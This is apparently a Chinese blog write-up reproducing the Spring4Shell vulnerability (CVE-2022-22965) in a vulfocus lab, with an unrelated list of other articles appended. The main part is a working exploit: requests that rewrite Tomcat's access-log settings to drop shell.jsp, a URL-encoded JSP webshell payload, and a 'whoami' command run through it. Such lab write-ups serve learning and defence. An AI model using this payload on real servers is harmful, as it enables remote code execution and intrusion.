（2022年12月最新）spring-core-rce漏洞复现CVE-2022-22965

2023-10-29

1、漏洞简介

2022年3月29日，Spring框架曝出RCE 0day漏洞。已经证实由于 SerializationUtils#deserialize 基于 Java 的序列化机制，可导致远程代码执行 (RCE)，使用JDK9及以上版本皆有可能受到影响。
通过该漏洞可写入webshell以及命令执行。在Spring框架的JDK9版本(及以上版本)中，远程攻击者可在满足特定条件的基础上，通过框架的参数绑定功能获取AccessLogValve对象并诸如恶意字段值，从而触发pipeline机制并写入任意路径下的文件。

2、漏洞利用条件

1、Apache Tomcat作为Servlet容器；
2、使用JDK9及以上版本的Spring MVC框架；
3、Spring框架以及衍生的框架spring-beans-*.jar文件或者存在CachedIntrospectionResults.class

3、漏洞复现

1、使用vulfocus靶场

docker pull vulfocus/spring-core-rce-2022-03-29:latest

2、分5次分别运行以下代码：

http://xxx.xxx.230.165:27379/?class.module.classLoader.resources.context.parent.pipeline.first.pattern=spring
http://xxx.xxx.230.165:27379/?class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp
http://xxx.xxx.230.165:27379/?class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT
http://xxx.xxx.230.165:27379/?class.module.classLoader.resources.context.parent.pipeline.first.prefix=shell
http://xxx.xxx.230.165:27379/?class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=

3、访问http://xxx.xxx.230.165:27379/?shell.jsp，出现spring说明写入成功
在这里插入图片描述
4、访问地址http://xxx.xxx.230.165:27379/?class.module.classLoader.resources.context.parent.pipeline.first.pattern=spring ，使用Burp进行抓包，替换pattern后的内容为如下payload，

```bash
%25%7Bc2%7Di%20if(%22t%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di

5、将如下参数带上，之后使用Burp进行发包

suffix:%>//
c1:Runtime
c2:<%

在这里插入图片描述
6、出现OK后，就可以访问http://xxx.xxx.230.165:27379/shell.jsp?pwd=t&cmd=whoami，即可执行任意代码

本文内容由网友自发贡献，版权归原作者所有，本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容，请联系:hwhale#tublm.com(使用前将#替换为@)

漏洞复现

Spring

springcorerce

springframework

CNVD202223942

（2022年12月最新）spring-core-rce漏洞复现CVE-2022-22965 的相关文章

bean 范围的真实用例

我正在学习 Spring 我了解了 bean 范围它们每个的真实世界用例是什么我无法获得任何帮助请帮助何时在 Spring 中使用 Singleton Prototype Request 和 Session 作用域辛格尔顿它为每个
端点按资源 swagger 注释分组？

我正在使用 Spring 进行 REST API 开发我有一些 API 其中有很多端点当我打开 swagger ui 时它看起来很拥挤我刚刚读过this https swagger io docs specification gro
防止 Spring Boot 注册 Spring Security 过滤器之一

我想禁用安全链中的 Spring Security 过滤器之一我已经看到了防止 Spring Boot 注册 servlet 过滤器 https stackoverflow com questions 28421966 prevent s
从 @JsonProperty 值获取枚举常量

我有一个标有 JsonProperty 的枚举用于使用 Jackson 进行 JSON 序列化反序列化并且希望获取给定字符串 JsonProperty 的枚举值 public enum TimeBucket JsonProperty
Spring Cloud Streams无法自动装配Source.class

我正在从头开始学习 Spring Cloud Streams 我尝试创建一个像这样的源应用程序 import org springframework cloud stream messaging Source etc RestControl
如何在 Spring 环境中更改属性？

我在应用程序中使用 spring 环境 Bean 来获取应用程序配置属性我想在不重新启动应用程序服务器的情况下从java代码更改spring环境中的属性值我怎样才能做到这一点 Service public void MyService
spring boot 使用哪个“切片”来测试服务组件

我正在使用 spring boot 开发一个rest api 它由标准层组成控制器 RestController 处理传入的http请求并公开api端点然后是服务层 Service 最后是存储库层 Repository 我的问题是关于单
未找到 MessageSource 的 ResourceBundle [消息]：找不到基本名称消息的包

在 applicationContext xml 中我定义了 MessageSource 如下所示
添加动态数量的监听器(Spring JMS)

我需要添加多个侦听器如中所述application properties文件就像下面这样 InTopics Sample QUT4 Sample T05 Sample T01 Sample JT7 注意这个数字可以多一些也可以少一些
如何在spring mvc中从控制器名称+操作名称获取映射的URL？

是否有现有的解决方案可以从 Spring MVC3 中的控制器名称操作名称获取映射的 URL 例如 asp net mvc 或 Rails 中的 UrlHelper 我觉得非常有用 thx 也许你想要这样的东西 in your Co
用于从字段中查找最大值的 MongoTemplate 方法或查询

我正在使用 MongoTemplate 进行数据库操作现在我想从所选结果中获取最大字段值有人可以指导我如何编写查询以便当我将查询传递给 find 方法时它将返回我所需的文档最大字段提前致谢问候可以在spring data mo
如何将使用消息侦听器接收到的 JMS 消息转换为域对象

我在用春季3 1 1 ActiveMQ 5 6 0 我有两个 JMS 应用程序应用程序 A 使用 JmsTemplate 使用 jmsTemplate convertAndSend msg 发送域对象 App B 使用消息监听器并注册了
无法捕获 Spring Batch 的 ItemWriter 中的异常

我正在编写一个 Spring Batch 流程来将数据集从一个系统迁移到另一个系统在这种情况下这就像使用RowMapper实现在传递给查询之前从查询构建对象ItemWriter The ItemWriter称为save我的 DAO 上的
使用 Spring Boot 托管单页面应用程序

因此我尝试使用 spring 来托管一个单页应用程序以及一个普通的 REST API 这意味着所有正常的请求 api 端点应由相应的控制器处理所有其他请求应定向到文件夹中的资源 static built 我已经通过捕捉所有内容来实现这个
如何在没有嵌入数据源配置的情况下在 Spring Boot 测试期间执行 `schema.sql`？

有一个带有 h2 数据库的 Spring Boot 应用程序用作主数据库还有一个resource schema sql由 Spring Boot 在启动时加载但在集成测试期间 SpringBootTestSpring Boot 确实n
为什么 @RunWith(SpringJUnit4ClassRunner.class) 不起作用？

我正在尝试使用 Spring 框架使用 JUnit 测试 CRUD 方法下面的代码完美运行 Transactional public class TestJdbcDaoImpl SuppressWarnings deprecation B
org.springframework.web.servlet.DispatcherServlet noHandlerFound（未找到映射）

我的jsps位于 WEB INF jsp 下以下是我的web xml
Java导入语句中的错误“无法解析导入javax.validation.constraints.NotNull”

开发Spring roo项目后我在类中发现以下错误 The import javax validation constraints NotNull cannot be resolved NotNull cannot be resolved
在 Spring Boot 异常处理期间保留自定义 MDC 属性

简短版本有足够的细节如何保留添加在MDC中的属性doFilter 的方法javax servlet Filter执行 public void doFilter ServletRequest request ServletResponse
Spring验证非空元素的字符串列表

我有一个模型类其中包含字符串列表该列表可以为空也可以包含元素如果它有元素这些元素不能为空举个例子假设我有一个名为 QuestionPaper 的类它有一个 QuestionId 列表其中每个都是一个字符串 class Qu

随机推荐

Map和Set详解

一二叉搜索树搜索树 1 二叉搜索树的概念二叉搜索树又称二叉排序树它或者是一棵空树或者是具有以下性质的二叉树若它的左子树不为空则左子树上所有节点的值都小于根节点的值若它的右子树不为空则右子树上所有节点的值都大于根节点的值它的
Vue引入qrcode.js实现生成二维码

最近Vue音视频项目应用层中有JavaScript生成二维码的需求所以记录下整个二维码生成的步骤 1 vue qr是基于qrcode js封装的vue库可以动态生成二维码并且可以自定义样式 npm install vue qr sav
unity中异步加载场景时灯光变暗的问题

记得以前遇到到这种情况然后经久不用忘记了这次记录一下加深印象你会发现跳转场景后后者的游戏场景的灯光会变暗而且还改不回原来的效果这里需要对场景进行灯光烘培具体操作 Window Lighting Settings 取消勾选
python处理复杂excel_Python实现Excel的10个常用操作！干货满满（建议收藏）

自从学了Python后就逼迫自己不用Excel 所有操作用Python实现直接进入正题数据是网上找到的销售数据长这样一关联公式 Vlookup vlookup是excel几乎最常用的公式一般用于两个表的关联查询等所以我先把这张
使用TypeScript 搜索JSON的简单方法

使用TS 写了一个简单的搜索JSON数组的方法分享给大家感觉效率一般有方法的朋友请拍砖 public static JsonQuery arr Array
浏览器滚动条样式

webkit scrollbar 滚动条整体部分 webkit scrollbar thumb 滚动条里面的小方块能上下左右移动取决于是垂直滚动条还是水平滚动条 webkit scrollbar track 滚动条的轨道里面装有thu
python找假硬币二分法_python – OpenCV硬币检测和自动结果检查

我正在开展一个硬币识别项目我遇到的第一件事就是从图像中提取正确的硬币即使是非常简单的图像也是如此硬币检测有很多好的工作方法但我认为所有这些都需要在申请后进行人工检查我测试了其中两个 cv2 HoughCircles和阈值与find
如何新建一个vue项目？

截止目前新建一个vue项目有多种选择比如 1 vue版本 vue2 vue3 2 脚手架 vue cli vue cli vite 其中 Vue cli Vue 一堆的js插件 vue cli是Vue cli的最新版本不同vue cl
DDL与DML语句

1 DDL语句 SQL语句结构化查询语句使用SQL与数据库沟通完成相应的数据库操作 l DDL 数据定义语言用来维护数据库对象 1 1 创建表 CREATE 创建表演示创建员工表 CREATE TABLE employee i
Python下载pandas库失败的解决办法

使用pip install pandas 总是失败在网上找了好几个办法都不行最后解决办法 pip default timeout 1000 install pandas 完美解决
package.json版本号符号^和~前缀的区别

开发中经常会使用npm install 安装依赖包经常会看到符号和符号现将二者的区别总结如下 devDependencies babel runtime 7 12 0 dcloudio types dcloudio uni auto
查找——二叉排序树（C语言实现）

二叉排序树二叉查找树树表的提出 1 如何在一个大型的数据集合上进行动态查找 1 顺序查找不要求元素的有序性插入删除的性能是O 1 查找性能是O n lt 需要一个个比较 gt 2 折半查找查找性能是O log2n 为保证元素的有
【Codeforces思维题】20220728

2022 07 28 1582D Vupsen Pupsen and 0 题目题目链接题解考虑确定 b i b i bi 和 b
HttpServletResponse对象

1 HttpServletResponse对象 1 Web服务器收到一个http请求会针对每个请求创建一个HttpServletRequest和HttpServletResponse对象向客户端发送数据找HttpServletRespo
angular 报错：ERROR Error: Uncaught (in promise): Error: Template parse errors:

angular 报错 ERROR Error Uncaught in promise Error Template parse errors 错误信息 More than one component matched on this elem
ajax工作服务器端产生js事件,javaweb期末题..doc

javaweb期末题四个scope及意义chapter6 p62 四个scope分别是pagerequest sessionapplication 意义动作用于声明 JSP 页面将使用存储在指定作用域中并可从中访问的 bean 动作包
简述为什么输出层在使用sigmoid做激励函数时, 代价函数用交叉熵比平方差更好

符号 C 代价函数 w weight b bias 学习速率在使用平方差作代价函数时其中a是预测结果即其用链式法则来求权重和偏置的偏导数就有这里求导过程我就不写了毕竟从宏观上来理解一个问题我觉得会更重要如果想去了解完整的过
html怎么转换成自己的链接,HTML文本转换成一个链接

A Compare BookA 12 2 BookB 41 4 44 6 BookC 1 11 17 2 8 而且这个JavaScript 我使用它来生产什么我想 txt txt replace BookA BookB BookC d g
Windows Server 2012 Opencv 或者javacv 运行不起来解决方法

现象是会提示你找不到依赖注意可以通过安装桌面体验来解决这个问题不要再下载什么dl l包了
（2022年12月最新）spring-core-rce漏洞复现CVE-2022-22965

1 漏洞简介 2022年3月29日 Spring框架曝出RCE 0day漏洞已经证实由于 SerializationUtils deserialize 基于 Java 的序列化机制可导致远程代码执行 RCE 使用JDK9及以上版本皆有可

热门标签